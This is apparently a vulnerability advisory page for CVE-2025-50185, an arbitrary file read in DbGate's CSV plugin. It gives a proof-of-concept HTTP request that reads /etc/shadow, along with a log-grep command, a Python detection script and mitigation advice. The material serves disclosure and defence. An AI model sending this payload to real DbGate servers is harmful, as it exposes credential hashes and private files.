CVE-2025-50185
BaseFortify

Publication date: 2025-07-26

Last updated on: 2025-07-29

Assigner: GitHub, Inc.

Description
DbGate is a cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.

```
POST /runners/load-reader HTTP/1.1
Host: <REPLACE ME>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: <REPLACE ME>
Content-Type: application/json
Authorization: Bearer <REPLACE ME>
Content-Length: 127
Origin: http://192.168.124.119:3000
Connection: keep-alive
Cookie: <REPLACE ME>
Priority: u=0
Cache-Control: max-age=0

{"functionName":"reader@dbgate-plugin-csv","props":{"fileName":"/etc\/shadow","limitRows":100}}
```

The request payload:

![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a)

Lines of the file being returned:

![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)

Meta Information

Published: 2025-07-26

Last Modified: 2025-07-29

Generated: 2026-05-07

AI Q&A: 2025-07-26

EPSS Evaluated: 2026-05-05

Affected Vendors & Products

Showing 1 associated CPE

| Vendor | Product | Version / Range |
|---|---|---|
| dbgate | dbgate | 6.4.2-alpine |

| CWE ID | Description |
|---|---|
| CWE-29 | The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '\..\filename' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory. |

AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability in DbGate (versions 6.6.0 and below) allows an authenticated user with application-level access to read arbitrary files on the system due to insufficient validation of file paths and file types in the CSV plugin. The plugin does not properly check the content type or file extension before reading files, enabling path traversal attacks that can access sensitive files anywhere on the system, including files restricted to the root user such as `/etc/shadow`. [1]


How can this vulnerability impact me?

This vulnerability can lead to unauthorized disclosure of sensitive information by allowing attackers to read any file on the system through the application interface. This includes critical system files and sensitive data that should be protected, potentially leading to data breaches, exposure of credentials, or other confidential information that could be exploited for further attacks. [1]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by monitoring for HTTP POST requests to the endpoint `/runners/load-reader` whose JSON payloads specify file paths outside the intended directories, especially sensitive files such as `/etc/shadow`. For example, log entries for requests whose payloads contain `"fileName":"/etc/shadow"`, or any other absolute path or path traversal sequence (e.g., `..`), can indicate exploitation attempts. A command to detect such attempts in web server logs could be:

```
grep -E 'POST /runners/load-reader' /var/log/nginx/access.log | grep 'fileName":"/'
```

The second `grep` matches only if request bodies are written to that log; a default nginx access log records the request line but not the body. Tools like `jq` can also be used to parse JSON payloads in logs and find suspicious file paths. [1]
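
The check described in this answer, as an added Python example (not code from the original page or from DbGate). It parses the JSON body instead of matching raw text, so the `\/` escape in the request above and backslash traversal forms are both caught. The JSON-lines record layout (`method`, `path`, `user`, `body`), the allowed root `/srv/dbgate/uploads` and the sample records are assumptions constructed for illustration.

```python
import json
import posixpath

ENDPOINT = "/runners/load-reader"
ALLOWED_ROOTS = ("/srv/dbgate/uploads",)  # assumption: site-specific placeholder

def classify(file_name):
    """Return why file_name is suspicious, or None if it looks legitimate."""
    if not isinstance(file_name, str):
        return None
    path = file_name.replace("\\", "/")  # CWE-29: treat '\..\' like '/../'
    if ".." in path.split("/"):
        return "traversal sequence"
    if path.startswith("/"):
        resolved = posixpath.normpath(path)
        if not any(resolved == r or resolved.startswith(r + "/") for r in ALLOWED_ROOTS):
            return "absolute path outside allowed roots"
    return None

def scan(log_lines):
    """Return (line number, user, fileName, reason) for each suspicious request."""
    findings = []
    for lineno, line in enumerate(log_lines, 1):
        try:
            rec = json.loads(line)
            body = json.loads(rec.get("body") or "{}")  # decodes '\/' escapes
            props = body.get("props") or {}
            name = props.get("fileName")
        except (ValueError, TypeError, AttributeError):
            continue  # not a JSON record, or body is not a JSON object
        if rec.get("method") != "POST" or not str(rec.get("path")).startswith(ENDPOINT):
            continue
        reason = classify(name)
        if reason:
            findings.append((lineno, rec.get("user"), name, reason))
    return findings

def _rec(user, body):  # build one constructed log record
    return json.dumps({"method": "POST", "path": ENDPOINT, "user": user, "body": body})

# Constructed sample log: the first body is the payload shown in the description.
SAMPLE_LOG = [
    _rec("user-a", r'{"functionName":"reader@dbgate-plugin-csv","props":{"fileName":"/etc\/shadow","limitRows":100}}'),
    _rec("user-b", '{"functionName":"reader@dbgate-plugin-csv","props":{"fileName":"/srv/dbgate/uploads/q3.csv","limitRows":100}}'),
    _rec("user-a", r'{"functionName":"reader@dbgate-plugin-csv","props":{"fileName":"\\..\\..\\etc\\shadow","limitRows":100}}'),
    "GET /health 200",  # non-JSON line, skipped
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
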


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include restricting access to the DbGate application to trusted users only, as the vulnerability requires application-level access. Additionally, monitor and block suspicious requests to the `/runners/load-reader` endpoint that attempt to read arbitrary files. Since no fix or patch is currently available, consider disabling or restricting the vulnerable CSV plugin functionality if possible, or isolating the DbGate instance in a secure environment to limit exposure. Applying network-level controls such as firewall rules to limit access to the application and enforcing strict authentication and authorization policies can also help reduce risk. [1]

